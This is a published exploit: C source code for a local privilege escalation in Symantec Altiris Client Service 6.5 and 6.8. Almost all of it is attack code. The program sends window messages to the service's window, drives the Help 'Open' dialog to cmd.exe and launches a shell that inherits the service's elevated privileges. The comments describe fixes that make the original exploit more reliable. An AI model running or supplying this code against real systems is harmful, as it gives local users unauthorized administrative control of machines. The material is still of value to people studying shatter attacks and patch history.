
# Title : Symantec Altiris Client Service 6.8.378 Local Privilege Escalation Exploit
# Published : 2008-05-15
# Author : Alex Hernandez


// 0day PRIVATE NOT DISTRIBUTE!!!
//
// Symantec Altiris Client Service Local Exploit (0day) 
//
// Affected Versions	: Altiris Client 6.5.248
//			  Altiris Client 6.5.299
//			  Altiris client 6.8.378
//
// Alex Hernandez aka alt3kx 
// ahernandez [at] sybsecurity.com
//
// Eduardo Vela aka sirdarckcat 
// sirdarckcat [at] gmail.com
//
// We'll see you soon at ph-neutral 0x7d8

#include <windows.h>

#include <errno.h>
#include <stdio.h>
#include <stdlib.h>

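/*
 * Primary language IDs (PRIMARYLANGID of a Win32 LANGID) for which the
 * original author shipped localized window titles.  Any other language
 * falls back to English (0x09), as the original did.
 */
enum {
    LANG_ID_ENGLISH = 0x09,
    LANG_ID_SPANISH = 0x0a,
    LANG_ID_FRENCH  = 0x0c
};

/*
 * Message and control IDs the original hard-coded as magic numbers.
 *   MSG_COMMANDHELP  - 0x365; the banner itself names this WM_COMMANDHELP.
 *   MSG_POPUP_SYSMENU - 0x313; undocumented, also sent by the MS04-019
 *                      Utility Manager exploit this is derived from.  The
 *                      name is the reviewer's reading of that write-up,
 *                      not something this file establishes -- confirm.
 *   OPEN_DLG_PATH_CTRL - 0x47C; the control the path is WM_SETTEXT'ed into
 *                      (presumably the file-name field of the common
 *                      "Open" dialog -- verify against dlgs.h).
 *   OPEN_DLG_TAB_CTRL  - 0x4A0; the control that receives VK_TAB.
 *   SHELLVIEW_LIST_CTRL - 0x1; child of the SHELLDLL_DefView pane that
 *                      receives the "cmd" keystrokes.
 */
enum {
    MSG_POPUP_SYSMENU   = 0x313,
    MSG_COMMANDHELP     = 0x365,
    OPEN_DLG_PATH_CTRL  = 0x47C,
    OPEN_DLG_TAB_CTRL   = 0x4A0,
    SHELLVIEW_LIST_CTRL = 0x1
};

/* Title of the top-level window the target service owns. */
static const char SERVICE_WINDOW[] = "Altiris Client Service";

/* Localized title of the help window the service opens; NULL if the
 * language has no known title. */
static const char *help_window_title(int lang)
{
    switch (lang) {
    case LANG_ID_ENGLISH: return "Windows Help";
    case LANG_ID_SPANISH: return "Ayuda de Windows";
    case LANG_ID_FRENCH:  return "Aide de Windows";
    default:              return NULL;
    }
}

/* Localized title of the common "Open" dialog; NULL if unsupported. */
static const char *open_dialog_title(int lang)
{
    switch (lang) {
    case LANG_ID_ENGLISH: return "Open";
    case LANG_ID_SPANISH: return "Abrir";
    case LANG_ID_FRENCH:  return "Ouvrir";
    default:              return NULL;
    }
}

/*
 * Parse the LANG-ID command-line argument.
 *
 * Accepts a decimal number or a 0x-prefixed hex number (MSDN lists the IDs
 * in hex).  Returns 1 and stores the value in *out on success; returns 0
 * for empty input, trailing junk, overflow or a value outside 0..0xFF.
 *
 * The original used atoi() and then indexed a 255-entry stack array with
 * the unchecked result, so a negative or large argument read and wrote
 * outside the array; this is the bounds check that was missing.
 */
static int parse_lang_id(const char *text, int *out)
{
    char *end = NULL;
    long value;
    int base;

    if (text == NULL || *text == '\0')
        return 0;
    base = (text[0] == '0' && (text[1] == 'x' || text[1] == 'X')) ? 16 : 10;
    errno = 0;
    value = strtol(text, &end, base);
    if (end == text || *end != '\0' || errno == ERANGE || value < 0 || value > 0xFF)
        return 0;
    *out = (int)value;
    return 1;
}

/* Deliver a key press the way the original did: WM_IME_KEYDOWN sent
 * straight to the control, bypassing the input queue. */
static void send_key(HWND target, int vk)
{
    SendMessage(target, WM_IME_KEYDOWN, vk, 0);
}

/* Success signal: a console window titled with the cmd.exe path exists.
 * Both the NT-era and 2000/XP-era system directories are checked. */
static int shell_window_present(void)
{
    return FindWindow(NULL, "C:\\WINDOWS\\system32\\cmd.exe") != NULL
        || FindWindow(NULL, "C:\\WINNT\\system32\\cmd.exe") != NULL;
}

/*
 * Entry point.
 *
 * Usage: <prog> [LANG-ID]
 *
 * Drives the Altiris Client Service window through a chain of window
 * messages: pop its system menu, request help, open the help window's
 * "Open" dialog, browse to cmd.exe and launch it from the file's context
 * menu.  Every handle returned by FindWindow/GetDlgItem is checked before
 * it is used; the original sent messages to NULL handles on any miss.
 *
 * Changes from the original besides the handle checks: the "\n" and "\\"
 * escapes that were lost from every string literal are restored; the
 * LANG-ID argument is validated instead of being used as a raw array
 * index; the language-guess fallback actually runs when no argument is
 * given (the usage text always promised it would); the retry re-sends
 * WM_CONTEXTMENU to the file list rather than to whatever WindowFromPoint
 * returned on the first try; and success on the retry is reported as
 * success instead of as failure.
 *
 * Returns 0 in every case, as the original did.
 */
int main(int argc, char *argv[])
{
    HWND service_wnd, help_wnd, open_dlg, ctrl, list_view, menu_wnd;
    POINT menu_point;
    const char *help_title, *open_title;
    int lang, requested, attempt;
    int shell_opened = 0;
    /* "?" lets the dialog match cmd.exe without the exact extension;
     * %windir% is expanded by the dialog, not by this program. */
    char path_text[] = "%windir%\\system32\\cmd.ex?";

    printf("##########################################################\n");
    printf("#                  Altiris Client Service                #\n");
    printf("# WM_COMMANDHELP Windows Privilege Escalation Exploit    #\n");
    printf("# by sirdarckcat & alt3kx                                #\n");
    printf("#                                                        #\n");
    printf("# This exploit is based on www.milw0rm.com/exploits/350  #\n");
    printf("# Utility Manager Privilege Elevation Exploit (MS04-019) #\n");
    printf("# by Cesar Cerrudo                                       #\n");
    printf("##########################################################\n\n");

    /* Guess the language: system default, then user default, then English.
     * Only languages with known window titles are usable. */
    lang = PRIMARYLANGID(GetSystemDefaultLangID());
    if (help_window_title(lang) == NULL)
        lang = PRIMARYLANGID(GetUserDefaultLangID());
    if (help_window_title(lang) == NULL) {
        printf("Lang not found, using english\n");
        lang = LANG_ID_ENGLISH;
    }

    if (argc < 2) {
        printf("Use:\n> %s [LANG-ID]\n\n", argv[0]);
        printf("Look for your LANG-ID here:\n");
        printf("http://msdn2.microsoft.com/en-us/library/ms776294.aspx\n");
        printf("\nAnyway, the program will try to guess it.\n\n");
    } else if (parse_lang_id(argv[1], &requested) && help_window_title(requested) != NULL) {
        lang = requested;
        printf("Lang changed\n");
    } else {
        printf("Lang not supported\n");
    }
    help_title = help_window_title(lang);
    open_title = open_dialog_title(lang);
    printf("Using Lang %d\n", lang);

    printf("Looking for %s..\n", SERVICE_WINDOW);
    service_wnd = FindWindow(NULL, SERVICE_WINDOW);
    if (service_wnd == NULL) {
        printf("Window %s not found\n", SERVICE_WINDOW);
        return 0;
    }
    printf("Found! exploiting..\n");

    /* Step 1: system-menu message, then the help request.  The service is
     * expected to answer by opening the Windows Help window, which is what
     * the rest of the program drives. */
    PostMessage(service_wnd, MSG_POPUP_SYSMENU, 0, 0);
    Sleep(100);
    SendMessage(service_wnd, MSG_COMMANDHELP, 0, 1);
    Sleep(300);

    /* Look for the help window under the chosen language; on a miss, try
     * once more with the English titles before giving up. */
    for (;;) {
        help_wnd = FindWindow(NULL, help_title);
        if (help_wnd != NULL)
            break;
        printf("Help Window not found.. exploit unsuccesful\n");
        if (lang == LANG_ID_ENGLISH)
            return 0;
        printf("Trying with english..\n");
        lang = LANG_ID_ENGLISH;
        help_title = help_window_title(lang);
        open_title = open_dialog_title(lang);
    }
    printf("Help Window found! exploiting..\n");

    /* Step 2: Enter in the help window brings up its "Open" dialog
     * ("#32770" is the standard dialog window class). */
    send_key(help_wnd, VK_RETURN);
    Sleep(500);
    open_dlg = FindWindow("#32770", open_title);
    if (open_dlg == NULL) {
        printf("Open dialog '%s' not found.. exploit unsuccesful\n", open_title);
        return 0;
    }
    ctrl = GetDlgItem(open_dlg, OPEN_DLG_PATH_CTRL);
    if (ctrl == NULL) {
        printf("Path control not found in the Open dialog.. exploit unsuccesful\n");
        return 0;
    }
    Sleep(500);
    printf("Sending path..\n");
    SendMessage(ctrl, WM_SETTEXT, 0, (LPARAM)path_text);
    Sleep(800);
    send_key(ctrl, VK_RETURN);

    ctrl = GetDlgItem(open_dlg, OPEN_DLG_TAB_CTRL);
    if (ctrl == NULL) {
        printf("Tab target control not found in the Open dialog.. exploit unsuccesful\n");
        return 0;
    }
    printf("Looking for cmd..\n");
    send_key(ctrl, VK_TAB);
    Sleep(500);

    /* Select the cmd entry in the file list by typing its name. */
    list_view = FindWindowEx(open_dlg, NULL, "SHELLDLL_DefView", NULL);
    if (list_view != NULL)
        list_view = GetDlgItem(list_view, SHELLVIEW_LIST_CTRL);
    if (list_view == NULL) {
        printf("File list not found in the Open dialog.. exploit unsuccesful\n");
        return 0;
    }
    printf("Sending keys..\n");
    send_key(list_view, 'C');
    send_key(list_view, 'M');
    send_key(list_view, 'D');
    Sleep(500);

    /* Step 3: open the selected file's context menu, move down two entries
     * and confirm.  One retry, as in the original; the retry re-sends the
     * context-menu request to the file list (the original re-sent it to
     * the window found under the cursor, which was rarely the list). */
    for (attempt = 0; attempt < 2 && !shell_opened; attempt++) {
        PostMessage(list_view, WM_CONTEXTMENU, 0, 0);
        Sleep(1000);
        menu_point.x = 10;
        menu_point.y = 30;
        menu_wnd = WindowFromPoint(menu_point);
        Sleep(1000);
        if (menu_wnd == NULL) {
            printf("Context menu not found\n");
            printf("Failed\n");
            continue;
        }
        printf("Opening shell..\n");
        SendMessage(menu_wnd, WM_KEYDOWN, VK_DOWN, 0);
        Sleep(1000);
        SendMessage(menu_wnd, WM_KEYDOWN, VK_DOWN, 0);
        Sleep(1000);
        SendMessage(menu_wnd, WM_KEYDOWN, VK_RETURN, 0);
        Sleep(1000);
        shell_opened = shell_window_present();
        if (!shell_opened)
            printf("Failed\n");
    }

    if (shell_opened) {
        printf("Done!\n");
        /* Tidy up the dialog and help windows that were opened. */
        SendMessage(open_dlg, WM_CLOSE, 0, 0);
        Sleep(500);
        SendMessage(FindWindow(NULL, help_title), WM_CLOSE, 0, 0);
        /* Kept from the original: closes a window titled like the LANG-ID
         * argument.  Its purpose is unclear; guarded so that a missing
         * argument cannot turn it into FindWindow(NULL, NULL), which would
         * match -- and close -- an arbitrary top-level window. */
        if (argc >= 2)
            SendMessage(FindWindow(NULL, argv[1]), WM_CLOSE, 0, 0);
    } else {
        printf("The exploit failed, but maybe the context window of the shell is visibile.\n");
    }
    return 0;
}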

// www.Syue.com [2008-05-15]